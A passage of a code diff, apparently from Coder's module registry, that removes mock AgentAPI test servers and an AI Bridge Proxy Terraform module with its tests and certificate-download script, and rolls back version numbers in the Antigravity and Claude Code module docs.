-// Usage: MESSAGES='[...]' node agentapi-mock-shutdown.js [port]
-
-const http = require("http");
-const fs = require("fs");
-const port = process.argv[2] || 3284;
-
-// Write PID file for shutdown script.
-if (process.env.AGENTAPI_PID_FILE) {
-  const path = require("path");
-  fs.mkdirSync(path.dirname(process.env.AGENTAPI_PID_FILE), {
-    recursive: true,
-  });
-  fs.writeFileSync(process.env.AGENTAPI_PID_FILE, String(process.pid));
-}
-
-// Handle SIGUSR1 (state save signal from shutdown script).
-process.on("SIGUSR1", () => {
-  fs.writeFileSync(
-    "/tmp/sigusr1-received",
-    `SIGUSR1 received at ${Date.now()}\n`,
-  );
-});
-
-// Parse messages from environment or use default
-let messages = [];
-if (process.env.MESSAGES) {
-  try {
-    messages = JSON.parse(process.env.MESSAGES);
-  } catch (e) {
-    console.error("Failed to parse MESSAGES env var:", e.message);
-    process.exit(1);
-  }
-}
-
-// Presets for common test scenarios
-if (process.env.PRESET === "normal") {
-  messages = [
-    { id: 1, type: "input", content: "Hello", time: "2025-01-01T00:00:00Z" },
-    {
-      id: 2,
-      type: "output",
-      content: "Hi there",
-      time: "2025-01-01T00:00:01Z",
-    },
-    {
-      id: 3,
-      type: "input",
-      content: "How are you?",
-      time: "2025-01-01T00:00:02Z",
-    },
-    {
-      id: 4,
-      type: "output",
-      content: "Good!",
-      time: "2025-01-01T00:00:03Z",
-    },
-    { id: 5, type: "input", content: "Great", time: "2025-01-01T00:00:04Z" },
-  ];
-} else if (process.env.PRESET === "many") {
-  messages = Array.from({ length: 15 }, (_, i) => ({
-    id: i + 1,
-    type: "input",
-    content: `Message ${i + 1}`,
-    time: "2025-01-01T00:00:00Z",
-  }));
-} else if (process.env.PRESET === "huge") {
-  messages = [
-    {
-      id: 1,
-      type: "output",
-      content: "x".repeat(70000),
-      time: "2025-01-01T00:00:00Z",
-    },
-  ];
-}
-
-const server = http.createServer((req, res) => {
-  if (req.url === "/messages") {
-    res.writeHead(200, { "Content-Type": "application/json" });
-    res.end(JSON.stringify({ messages }));
-  } else if (req.url === "/status") {
-    res.writeHead(200, { "Content-Type": "application/json" });
-    res.end(JSON.stringify({ status: "stable" }));
-  } else {
-    res.writeHead(404);
-    res.end();
-  }
-});
-
-server.listen(port, () => {
-  console.error(`Mock AgentAPI listening on port ${port}`);
-});
-
-process.on("SIGTERM", () => {
-  server.close(() => process.exit(0));
-});
-
-process.on("SIGINT", () => {
-  server.close(() => process.exit(0));
-});
@@ -6,50 +6,12 @@ const args = process.argv.slice(2);
 const portIdx = args.findIndex((arg) => arg === "--port") + 1;
 const port = portIdx ? args[portIdx] : 3284;

-if (args.includes("--version")) {
-  console.log("agentapi version 99.99.99");
-  process.exit(0);
-}
-
 console.log(`starting server on port ${port}`);
 fs.writeFileSync(
  "/home/coder/agentapi-mock.log",
  `AGENTAPI_ALLOWED_HOSTS: ${process.env.AGENTAPI_ALLOWED_HOSTS}`,
 );

-// Log state persistence env vars.
-for (const v of [
-  "AGENTAPI_STATE_FILE",
-  "AGENTAPI_PID_FILE",
-  "AGENTAPI_SAVE_STATE",
-  "AGENTAPI_LOAD_STATE",
-]) {
-  if (process.env[v]) {
-    fs.appendFileSync(
-      "/home/coder/agentapi-mock.log",
-      `\n${v}: ${process.env[v]}`,
-    );
-  }
-}
-// Log boundary env vars.
-for (const v of ["AGENTAPI_BOUNDARY_PREFIX"]) {
-  if (process.env[v]) {
-    fs.appendFileSync(
-      "/home/coder/agentapi-mock.log",
-      `\n${v}: ${process.env[v]}`,
-    );
-  }
-}
-
-// Write PID file for shutdown script.
-if (process.env.AGENTAPI_PID_FILE) {
-  const path = require("path");
-  fs.mkdirSync(path.dirname(process.env.AGENTAPI_PID_FILE), {
-    recursive: true,
-  });
-  fs.writeFileSync(process.env.AGENTAPI_PID_FILE, String(process.pid));
-}
-
 http
  .createServer(function (_request, response) {
    response.writeHead(200);
@@ -17,16 +17,6 @@ if [ -n "$AGENTAPI_CHAT_BASE_PATH" ]; then
  export AGENTAPI_CHAT_BASE_PATH
 fi

-# Use boundary wrapper if configured by agentapi module.
-# AGENTAPI_BOUNDARY_PREFIX is set by the agentapi module's main.sh
-# and points to a wrapper script that runs the command through coder boundary.
-if [ -n "${AGENTAPI_BOUNDARY_PREFIX:-}" ]; then
-  echo "Starting with boundary: ${AGENTAPI_BOUNDARY_PREFIX}" >> /home/coder/test-agentapi-start.log
-  agentapi server --port "$port" --term-width 67 --term-height 1190 -- \
-    "${AGENTAPI_BOUNDARY_PREFIX}" bash -c aiagent \
-    > "$log_file_path" 2>&1
-else
-  agentapi server --port "$port" --term-width 67 --term-height 1190 -- \
-    bash -c aiagent \
-    > "$log_file_path" 2>&1
-fi
+agentapi server --port "$port" --term-width 67 --term-height 1190 -- \
+  bash -c aiagent \
+  > "$log_file_path" 2>&1
@@ -1,61 +0,0 @@
-#!/usr/bin/env node
-// Mock Coder instance server for shutdown script tests.
-// Captures POST requests to /log-snapshot endpoint.
-
-const http = require("http");
-const fs = require("fs");
-const port = process.argv[2] || 8080;
-const outputFile = process.env.OUTPUT_FILE || "/tmp/snapshot-posted.json";
-const httpCode = parseInt(process.env.HTTP_CODE || "204", 10);
-
-const server = http.createServer((req, res) => {
-  const url = new URL(req.url, `http://localhost:${port}`);
-
-  // Expected path: /api/v2/workspaceagents/me/tasks/{task_id}/log-snapshot
-  const pathMatch = url.pathname.match(/\/tasks\/([^\/]+)\/log-snapshot$/);
-
-  if (req.method === "POST" && pathMatch) {
-    const taskId = pathMatch[1];
-    let body = "";
-    req.on("data", (chunk) => {
-      body += chunk.toString();
-    });
-
-    req.on("end", () => {
-      // Save captured snapshot with task ID for verification
-      const snapshotData = {
-        task_id: taskId,
-        payload: JSON.parse(body),
-      };
-      fs.writeFileSync(outputFile, JSON.stringify(snapshotData, null, 2));
-      console.error(
-        `Captured snapshot for task ${taskId} (${body.length} bytes) to ${outputFile}`,
-      );
-
-      // Return configured status code
-      res.writeHead(httpCode);
-      res.end();
-    });
-
-    req.on("error", (err) => {
-      console.error("Request error:", err);
-      res.writeHead(500);
-      res.end();
-    });
-  } else {
-    res.writeHead(404);
-    res.end();
-  }
-});
-
-server.listen(port, () => {
-  console.error(`Mock Coder instance listening on port ${port}`);
-});
-
-process.on("SIGTERM", () => {
-  server.close(() => process.exit(0));
-});
-
-process.on("SIGINT", () => {
-  server.close(() => process.exit(0));
-});
@@ -1,89 +0,0 @@
---
-display_name: AI Bridge Proxy
-description: Configure a workspace to route AI tool traffic through AI Bridge via AI Bridge Proxy.
-icon: ../../../../.icons/coder.svg
-verified: true
-tags: [helper, aibridge]
---
-
-# AI Bridge Proxy
-
-This module configures a Coder workspace to use [AI Bridge Proxy](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy).
-It downloads the proxy's CA certificate from the Coder deployment and provides Terraform outputs (`proxy_auth_url` and `cert_path`) that tool-specific modules can use to route their traffic through the proxy.
-
-```tf
-module "aibridge-proxy" {
-  source    = "registry.coder.com/coder/aibridge-proxy/coder"
-  version   = "1.0.0"
-  agent_id  = coder_agent.main.id
-  proxy_url = "https://aiproxy.example.com"
-}
-```
-
-> [!NOTE]
-> AI Bridge Proxy is a Premium Coder feature that requires [AI Governance Add-On](https://coder.com/docs/ai-coder/ai-governance).
-> See the [AI Bridge Proxy setup guide](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy/setup) for details on configuring the proxy on your Coder deployment.
-
-## How it works
-
-[AI Bridge Proxy](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy) is an HTTP proxy that intercepts traffic to AI providers and forwards it through [AI Bridge](https://coder.com/docs/ai-coder/ai-bridge), enabling centralized LLM management, governance, and cost tracking.
-Any process with the proxy environment variables set will route **all** its traffic through the proxy.
-
-This module **does not** set proxy environment variables globally on the workspace.
-Instead, it provides Terraform outputs (`proxy_auth_url` and `cert_path`) that tool-specific modules consume to configure proxy routing.
-See the [Copilot module](https://registry.coder.com/modules/coder-labs/copilot) for a working integration example.
-
-It is recommended that tool modules scope the proxy environment variables to their own process rather than setting them globally on the workspace, to avoid routing unnecessary traffic through the proxy.
-
-> [!WARNING]
-> If the setup script fails (e.g. the proxy is unreachable), the workspace will still start but the agent will report a startup script error.
-> Tools that depend on the proxy will not work until the issue is resolved. Check the workspace build logs for details.
-
-## Startup Coordination
-
-When used with tool-specific modules (e.g. [Copilot](https://registry.coder.com/modules/coder-labs/copilot)),
-the setup script signals completion via [`coder exp sync`](https://coder.com/docs/admin/templates/startup-coordination) so dependent modules can wait for the `aibridge-proxy` module to complete before starting.
-
-Dependent modules are unblocked once the setup script finishes, regardless of success or failure.
-If the setup fails, dependent modules are expected to detect the failure and handle the error accordingly.
-
-To enable startup coordination, set `CODER_AGENT_SOCKET_SERVER_ENABLED=true` in the workspace container environment:
-
-```hcl
-env = [
-  "CODER_AGENT_TOKEN=${coder_agent.main.token}",
-  "CODER_AGENT_SOCKET_SERVER_ENABLED=true",
-]
-```
-
-> [!NOTE]
-> [Startup coordination](https://coder.com/docs/admin/templates/startup-coordination) requires Coder >= v2.30.
-> Without it, the sync calls are skipped gracefully but dependent modules may fail to start if the `aibridge-proxy` setup has not completed in time.
-
-## Examples
-
-### Custom certificate path
-
-```tf
-module "aibridge-proxy" {
-  source    = "registry.coder.com/coder/aibridge-proxy/coder"
-  version   = "1.0.0"
-  agent_id  = coder_agent.main.id
-  proxy_url = "https://aiproxy.example.com"
-  cert_path = "/home/coder/.certs/aibridge-proxy-ca.pem"
-}
-```
-
-### Proxy with custom port
-
-For deployments where the proxy is accessed directly on a configured port.
-See [security considerations](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy/setup#security-considerations) for network access guidelines.
-
-```tf
-module "aibridge-proxy" {
-  source    = "registry.coder.com/coder/aibridge-proxy/coder"
-  version   = "1.0.0"
-  agent_id  = coder_agent.main.id
-  proxy_url = "http://internal-proxy:8888"
-}
-```
@@ -1,254 +0,0 @@
-import { serve } from "bun";
-import {
-  afterEach,
-  beforeAll,
-  describe,
-  expect,
-  it,
-  setDefaultTimeout,
-} from "bun:test";
-import {
-  execContainer,
-  findResourceInstance,
-  removeContainer,
-  runContainer,
-  runTerraformApply,
-  runTerraformInit,
-  testRequiredVariables,
-} from "~test";
-
-let cleanupFunctions: (() => Promise<void>)[] = [];
-const registerCleanup = (cleanup: () => Promise<void>) => {
-  cleanupFunctions.push(cleanup);
-};
-afterEach(async () => {
-  const cleanupFnsCopy = cleanupFunctions.slice().reverse();
-  cleanupFunctions = [];
-  for (const cleanup of cleanupFnsCopy) {
-    try {
-      await cleanup();
-    } catch (error) {
-      console.error("Error during cleanup:", error);
-    }
-  }
-});
-
-const FAKE_CERT =
-  "-----BEGIN CERTIFICATE-----\nMIIBfakecert\n-----END CERTIFICATE-----\n";
-
-// Runs terraform apply to render the setup script, then starts a Docker
-// container where we can execute it against a mock server.
-const setupContainer = async (vars: Record<string, string> = {}) => {
-  const state = await runTerraformApply(import.meta.dir, {
-    agent_id: "foo",
-    proxy_url: "https://aiproxy.example.com",
-    ...vars,
-  });
-  const instance = findResourceInstance(state, "coder_script");
-  const id = await runContainer("lorello/alpine-bash");
-
-  registerCleanup(async () => {
-    await removeContainer(id);
-  });
-
-  return { id, instance };
-};
-
-// Starts a mock HTTP server that simulates the Coder API certificate endpoint.
-// Returns the server and its base URL.
-const setupServer = (handler: (req: Request) => Response) => {
-  const server = serve({
-    fetch: handler,
-    port: 0,
-  });
-  registerCleanup(async () => {
-    server.stop();
-  });
-  return {
-    server,
-    // Base URL without trailing slash
-    url: server.url.toString().slice(0, -1),
-  };
-};
-
-setDefaultTimeout(30 * 1000);
-
-describe("aibridge-proxy", () => {
-  beforeAll(async () => {
-    await runTerraformInit(import.meta.dir);
-  });
-
-  // Verify that agent_id and proxy_url are required.
-  testRequiredVariables(import.meta.dir, {
-    agent_id: "foo",
-    proxy_url: "https://aiproxy.example.com",
-  });
-
-  it("downloads the CA certificate successfully", async () => {
-    let receivedToken = "";
-    const { url } = setupServer((req) => {
-      const reqUrl = new URL(req.url);
-      if (reqUrl.pathname === "/api/v2/aibridge/proxy/ca-cert.pem") {
-        receivedToken = req.headers.get("Coder-Session-Token") || "";
-        return new Response(FAKE_CERT, {
-          status: 200,
-          headers: { "Content-Type": "application/x-pem-file" },
-        });
-      }
-      return new Response("not found", { status: 404 });
-    });
-
-    const { id, instance } = await setupContainer();
-
-    // Override ACCESS_URL and SESSION_TOKEN at runtime to point at the mock server.
-    const exec = await execContainer(id, [
-      "env",
-      `ACCESS_URL=${url}`,
-      "SESSION_TOKEN=test-session-token-123",
-      "bash",
-      "-c",
-      instance.script,
-    ]);
-    expect(exec.exitCode).toBe(0);
-    expect(exec.stdout).toContain(
-      "AI Bridge Proxy CA certificate saved to /tmp/aibridge-proxy/ca-cert.pem",
-    );
-
-    // Verify the cert was written to the default path.
-    const certContent = await execContainer(id, [
-      "cat",
-      "/tmp/aibridge-proxy/ca-cert.pem",
-    ]);
-    expect(certContent.stdout).toContain("BEGIN CERTIFICATE");
-
-    // Verify the session token was sent in the request header.
-    expect(receivedToken).toBe("test-session-token-123");
-  });
-
-  it("fails when the server is unreachable", async () => {
-    const { id, instance } = await setupContainer();
-
-    // Port 9999 has nothing listening, so curl will fail to connect.
-    const exec = await execContainer(id, [
-      "env",
-      "ACCESS_URL=http://localhost:9999",
-      "SESSION_TOKEN=mock-token",
-      "bash",
-      "-c",
-      instance.script,
-    ]);
-    expect(exec.exitCode).not.toBe(0);
-    expect(exec.stdout).toContain(
-      "AI Bridge Proxy setup failed: could not connect to",
-    );
-  });
-
-  it("fails when the server returns a non-200 status", async () => {
-    const { url } = setupServer(() => {
-      return new Response("not found", { status: 404 });
-    });
-
-    const { id, instance } = await setupContainer();
-
-    const exec = await execContainer(id, [
-      "env",
-      `ACCESS_URL=${url}`,
-      "SESSION_TOKEN=mock-token",
-      "bash",
-      "-c",
-      instance.script,
-    ]);
-    expect(exec.exitCode).not.toBe(0);
-    expect(exec.stdout).toContain(
-      "AI Bridge Proxy setup failed: unexpected response",
-    );
-  });
-
-  it("fails when the server returns an empty response", async () => {
-    const { url } = setupServer((req) => {
-      const reqUrl = new URL(req.url);
-      if (reqUrl.pathname === "/api/v2/aibridge/proxy/ca-cert.pem") {
-        return new Response("", { status: 200 });
-      }
-      return new Response("not found", { status: 404 });
-    });
-
-    const { id, instance } = await setupContainer();
-
-    const exec = await execContainer(id, [
-      "env",
-      `ACCESS_URL=${url}`,
-      "SESSION_TOKEN=mock-token",
-      "bash",
-      "-c",
-      instance.script,
-    ]);
-    expect(exec.exitCode).not.toBe(0);
-    expect(exec.stdout).toContain(
-      "AI Bridge Proxy setup failed: downloaded certificate is empty.",
-    );
-  });
-
-  it("saves the certificate to a custom path", async () => {
-    const { url } = setupServer((req) => {
-      const reqUrl = new URL(req.url);
-      if (reqUrl.pathname === "/api/v2/aibridge/proxy/ca-cert.pem") {
-        return new Response(FAKE_CERT, {
-          status: 200,
-          headers: { "Content-Type": "application/x-pem-file" },
-        });
-      }
-      return new Response("not found", { status: 404 });
-    });
-
-    // Pass a custom cert_path to terraform apply so the script uses it.
-    const { id, instance } = await setupContainer({
-      cert_path: "/tmp/custom/certs/proxy-ca.pem",
-    });
-
-    const exec = await execContainer(id, [
-      "env",
-      `ACCESS_URL=${url}`,
-      "SESSION_TOKEN=mock-token",
-      "bash",
-      "-c",
-      instance.script,
-    ]);
-    expect(exec.exitCode).toBe(0);
-    expect(exec.stdout).toContain(
-      "AI Bridge Proxy CA certificate saved to /tmp/custom/certs/proxy-ca.pem",
-    );
-
-    const certContent = await execContainer(id, [
-      "cat",
-      "/tmp/custom/certs/proxy-ca.pem",
-    ]);
-    expect(certContent.stdout).toContain("BEGIN CERTIFICATE");
-  });
-
-  it("does not create global proxy env vars via coder_env", async () => {
-    const state = await runTerraformApply(import.meta.dir, {
-      agent_id: "foo",
-      proxy_url: "https://aiproxy.example.com",
-    });
-
-    // Proxy env vars should NOT be set globally via coder_env.
-    // They are intended to be scoped to specific tool processes.
-    const proxyEnvVarNames = [
-      "HTTP_PROXY",
-      "HTTPS_PROXY",
-      "NODE_EXTRA_CA_CERTS",
-      "SSL_CERT_FILE",
-      "REQUESTS_CA_BUNDLE",
-      "CURL_CA_BUNDLE",
-    ];
-    const proxyEnvVars = state.resources.filter(
-      (r) =>
-        r.type === "coder_env" &&
-        r.instances.some((i) =>
-          proxyEnvVarNames.includes(i.attributes.name as string),
-        ),
-    );
-    expect(proxyEnvVars.length).toBe(0);
-  });
-});
@@ -1,81 +0,0 @@
-terraform {
-  required_version = ">= 1.9"
-
-  required_providers {
-    coder = {
-      source  = "coder/coder"
-      version = ">= 2.12"
-    }
-  }
-}
-
-variable "agent_id" {
-  type        = string
-  description = "The ID of a Coder agent."
-}
-
-variable "proxy_url" {
-  type        = string
-  description = "The full URL of the AI Bridge Proxy. Include the port if not using standard ports (e.g. https://aiproxy.example.com or http://internal-proxy:8888)."
-
-  validation {
-    condition     = can(regex("^https?://", var.proxy_url))
-    error_message = "proxy_url must start with http:// or https://."
-  }
-}
-
-variable "cert_path" {
-  type        = string
-  description = "Absolute path where the AI Bridge Proxy CA certificate will be saved."
-  default     = "/tmp/aibridge-proxy/ca-cert.pem"
-
-  validation {
-    condition     = startswith(var.cert_path, "/")
-    error_message = "cert_path must be an absolute path."
-  }
-}
-
-data "coder_workspace" "me" {}
-
-data "coder_workspace_owner" "me" {}
-
-locals {
-  # Build the proxy URL with Coder authentication embedded.
-  # AI Bridge Proxy expects the Coder session token as the password
-  # in basic auth: http://coder:<token>@host:port
-  proxy_auth_url = replace(
-    var.proxy_url,
-    "://",
-    "://coder:${data.coder_workspace_owner.me.session_token}@"
-  )
-}
-
-# These outputs are intended to be consumed by tool-specific modules,
-# to set proxy environment variables scoped to their process, rather than globally.
-output "proxy_auth_url" {
-  description = "The AI Bridge Proxy URL with Coder authentication embedded (http://coder:<token>@host:port)."
-  value       = local.proxy_auth_url
-  sensitive   = true
-}
-
-output "cert_path" {
-  description = "Path to the downloaded AI Bridge Proxy CA certificate."
-  value       = var.cert_path
-}
-
-# Downloads the CA certificate from the Coder deployment.
-# This runs on workspace start but does not block login, if the script
-# fails, the workspace remains usable and the error is visible in the build logs.
-# Tools that depend on the proxy will fail until the certificate is available.
-resource "coder_script" "aibridge_proxy_setup" {
-  agent_id           = var.agent_id
-  display_name       = "AI Bridge Proxy Setup"
-  icon               = "/icon/coder.svg"
-  run_on_start       = true
-  start_blocks_login = false
-  script = templatefile("${path.module}/scripts/setup.sh", {
-    CERT_PATH     = var.cert_path,
-    ACCESS_URL    = data.coder_workspace.me.access_url,
-    SESSION_TOKEN = data.coder_workspace_owner.me.session_token,
-  })
-}
@@ -1,210 +0,0 @@
-run "test_aibridge_proxy_basic" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-  }
-
-  assert {
-    condition     = var.agent_id == "test-agent-id"
-    error_message = "Agent ID should match the input variable"
-  }
-
-  assert {
-    condition     = var.proxy_url == "https://aiproxy.example.com"
-    error_message = "Proxy URL should match the input variable"
-  }
-
-  assert {
-    condition     = var.cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
-    error_message = "cert_path should default to /tmp/aibridge-proxy/ca-cert.pem"
-  }
-}
-
-run "test_aibridge_proxy_empty_url_validation" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = ""
-  }
-
-  expect_failures = [
-    var.proxy_url,
-  ]
-}
-
-run "test_aibridge_proxy_invalid_url_validation" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "aiproxy.example.com"
-  }
-
-  expect_failures = [
-    var.proxy_url,
-  ]
-}
-
-run "test_aibridge_proxy_url_formats" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-  }
-
-  assert {
-    condition     = can(regex("^https?://", var.proxy_url))
-    error_message = "Proxy URL should be a valid URL with scheme"
-  }
-}
-
-run "test_aibridge_proxy_https_with_port" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com:8443"
-  }
-
-  assert {
-    condition     = can(regex("^https?://", var.proxy_url))
-    error_message = "Proxy URL should support HTTPS with custom port"
-  }
-}
-
-run "test_aibridge_proxy_http_with_port" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "http://internal-proxy:8888"
-  }
-
-  assert {
-    condition     = can(regex("^https?://", var.proxy_url))
-    error_message = "Proxy URL should support HTTP with custom port"
-  }
-}
-
-run "test_aibridge_proxy_empty_cert_path_validation" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-    cert_path = ""
-  }
-
-  expect_failures = [
-    var.cert_path,
-  ]
-}
-
-run "test_aibridge_proxy_relative_cert_path_validation" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-    cert_path = "relative/path/ca-cert.pem"
-  }
-
-  expect_failures = [
-    var.cert_path,
-  ]
-}
-
-run "test_aibridge_proxy_custom_cert_path" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-    cert_path = "/home/coder/.certs/ca-cert.pem"
-  }
-
-  assert {
-    condition     = var.cert_path == "/home/coder/.certs/ca-cert.pem"
-    error_message = "cert_path should match the input variable"
-  }
-}
-
-run "test_aibridge_proxy_script" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-  }
-
-  assert {
-    condition     = coder_script.aibridge_proxy_setup.run_on_start == true
-    error_message = "Script should run on start"
-  }
-
-  assert {
-    condition     = coder_script.aibridge_proxy_setup.start_blocks_login == false
-    error_message = "Script should not block login"
-  }
-
-  assert {
-    condition     = coder_script.aibridge_proxy_setup.display_name == "AI Bridge Proxy Setup"
-    error_message = "Script display name should be 'AI Bridge Proxy Setup'"
-  }
-}
-
-run "test_aibridge_proxy_auth_url_https" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "https://aiproxy.example.com"
-  }
-
-  override_data {
-    target = data.coder_workspace_owner.me
-    values = {
-      session_token = "mock-session-token"
-    }
-  }
-
-  assert {
-    condition     = output.proxy_auth_url == "https://coder:mock-session-token@aiproxy.example.com"
-    error_message = "proxy_auth_url should contain the mocked session token"
-  }
-
-  assert {
-    condition     = output.cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
-    error_message = "cert_path output should match the default"
-  }
-}
-
-run "test_aibridge_proxy_auth_url_http_with_port" {
-  command = plan
-
-  variables {
-    agent_id  = "test-agent-id"
-    proxy_url = "http://internal-proxy:8888"
-  }
-
-  override_data {
-    target = data.coder_workspace_owner.me
-    values = {
-      session_token = "mock-session-token"
-    }
-  }
-
-  assert {
-    condition     = output.proxy_auth_url == "http://coder:mock-session-token@internal-proxy:8888"
-    error_message = "proxy_auth_url should preserve the port"
-  }
-
-  assert {
-    condition     = output.cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
-    error_message = "cert_path output should match the default"
-  }
-}
@@ -1,79 +0,0 @@
-#!/usr/bin/env bash
-
-if [ -z "$CERT_PATH" ]; then
-  CERT_PATH="${CERT_PATH}"
-fi
-
-if [ -z "$ACCESS_URL" ]; then
-  ACCESS_URL="${ACCESS_URL}"
-fi
-
-if [ -z "$SESSION_TOKEN" ]; then
-  SESSION_TOKEN="${SESSION_TOKEN}"
-fi
-
-set -euo pipefail
-
-# Signal startup coordination.
-# The trap ensures 'complete' is always called (even on failure) so dependent
-# scripts unblock promptly and can check for the certificate themselves.
-if command -v coder > /dev/null 2>&1; then
-  coder exp sync start "aibridge-proxy-setup" > /dev/null 2>&1 || true
-  trap 'coder exp sync complete "aibridge-proxy-setup" > /dev/null 2>&1 || true' EXIT
-fi
-
-if [ -z "$ACCESS_URL" ]; then
-  echo "Error: Coder access URL is not set."
-  exit 1
-fi
-
-if [ -z "$SESSION_TOKEN" ]; then
-  echo "Error: Coder session token is not set."
-  exit 1
-fi
-
-if ! command -v curl > /dev/null; then
-  echo "Error: curl is not installed."
-  exit 1
-fi
-
-echo "--------------------------------"
-echo "AI Bridge Proxy Setup"
-printf "Certificate path: %s\n" "$CERT_PATH"
-printf "Access URL: %s\n" "$ACCESS_URL"
-echo "--------------------------------"
-
-CERT_DIR=$(dirname "$CERT_PATH")
-mkdir -p "$CERT_DIR"
-
-CERT_URL="$ACCESS_URL/api/v2/aibridge/proxy/ca-cert.pem"
-echo "Downloading AI Bridge Proxy CA certificate from $CERT_URL..."
-
-# Download the certificate with a 5s connection timeout and 10s total timeout
-# to avoid the script hanging indefinitely.
-if ! HTTP_STATUS=$(curl -s -o "$CERT_PATH" -w "%%{http_code}" \
-  --connect-timeout 5 \
-  --max-time 10 \
-  -H "Coder-Session-Token: $SESSION_TOKEN" \
-  "$CERT_URL"); then
-  echo "❌ AI Bridge Proxy setup failed: could not connect to $CERT_URL."
-  echo "Ensure AI Bridge Proxy is enabled and reachable from the workspace."
-  rm -f "$CERT_PATH"
-  exit 1
-fi
-
-if [ "$HTTP_STATUS" -ne 200 ]; then
-  echo "❌ AI Bridge Proxy setup failed: unexpected response (HTTP $HTTP_STATUS)."
-  echo "Ensure AI Bridge Proxy is enabled and reachable from the workspace."
-  rm -f "$CERT_PATH"
-  exit 1
-fi
-
-if [ ! -s "$CERT_PATH" ]; then
-  echo "❌ AI Bridge Proxy setup failed: downloaded certificate is empty."
-  rm -f "$CERT_PATH"
-  exit 1
-fi
-
-echo "AI Bridge Proxy CA certificate saved to $CERT_PATH"
-echo "✅ AI Bridge Proxy setup complete."
@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "antigravity" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.1"
+  version  = "1.0.0"
  agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "antigravity" {
 module "antigravity" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.1"
+  version  = "1.0.0"
  agent_id = coder_agent.example.id
  folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Antigravity to use the GitHub MCP server with a
 module "antigravity" {
  count    = data.coder_workspace.me.start_count
  source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.1"
+  version  = "1.0.0"
  agent_id = coder_agent.example.id
  folder   = "/home/coder/project"
  mcp = jsonencode({
@@ -66,15 +66,15 @@ locals {

 module "vscode-desktop-core" {
  source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.1"

  agent_id = var.agent_id

-  coder_app_icon         = "/icon/antigravity.svg"
-  coder_app_slug         = var.slug
-  coder_app_display_name = var.display_name
-  coder_app_order        = var.order
-  coder_app_group        = var.group
+  web_app_icon         = "/icon/antigravity.svg"
+  web_app_slug         = var.slug
+  web_app_display_name = var.display_name
+  web_app_order        = var.order
+  web_app_group        = var.group

  folder      = var.folder
  open_recent = var.open_recent
@@ -13,7 +13,7 @@ Run the [Claude Code](https://docs.anthropic.com/en/docs/agents-and-tools/claude
 ```tf
 module "claude-code" {
  source         = "registry.coder.com/coder/claude-code/coder"
-  version        = "4.9.0"
+  version        = "4.5.0"
  agent_id       = coder_agent.main.id
  workdir        = "/home/coder/project"
  claude_api_key = "xxxx-xxxxx-xxxx"
@@ -36,43 +36,26 @@ module "claude-code" {

 By default, Claude Code automatically resumes existing conversations when your workspace restarts. Sessions are tracked per workspace directory, so conversations continue where you left off. If no session exists (first start), your `ai_prompt` will run normally. To disable this behavior and always start fresh, set `continue = false`

-## State Persistence
-
-AgentAPI can save and restore its conversation state to disk across workspace restarts. This complements `continue` (which resumes the Claude CLI session) by also preserving the AgentAPI-level context. Enabled by default, requires agentapi >= v0.12.0 (older versions skip it with a warning).
-
-To disable:
-
-```tf
-module "claude-code" {
-  # ... other config
-  enable_state_persistence = false
-}
-```
-
 ## Examples

 ### Usage with Agent Boundaries

 This example shows how to configure the Claude Code module to run the agent behind a process-level boundary that restricts its network access.

-By default, when `enable_boundary = true`, the module uses `coder boundary` subcommand (provided by Coder) without requiring any installation.
-
 ```tf
 module "claude-code" {
-  source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.9.0"
-  agent_id        = coder_agent.main.id
-  workdir         = "/home/coder/project"
-  enable_boundary = true
+  source           = "registry.coder.com/coder/claude-code/coder"
+  version          = "4.5.0"
+  agent_id         = coder_agent.main.id
+  workdir          = "/home/coder/project"
+  enable_boundary  = true
+  boundary_version = "v0.5.1"
 }
 ```

-> [!NOTE]
-> For developers: The module also supports installing boundary from a release version (`use_boundary_directly = true`) or compiling from source (`compile_boundary_from_source = true`). These are escape hatches for development and testing purposes.
-
 ### Usage with AI Bridge

-[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`. Requires Coder version >= 2.29.0.
+[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`.

 For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage with Tasks](#usage-with-tasks) example below.

@@ -81,7 +64,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "claude-code" {
  source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.9.0"
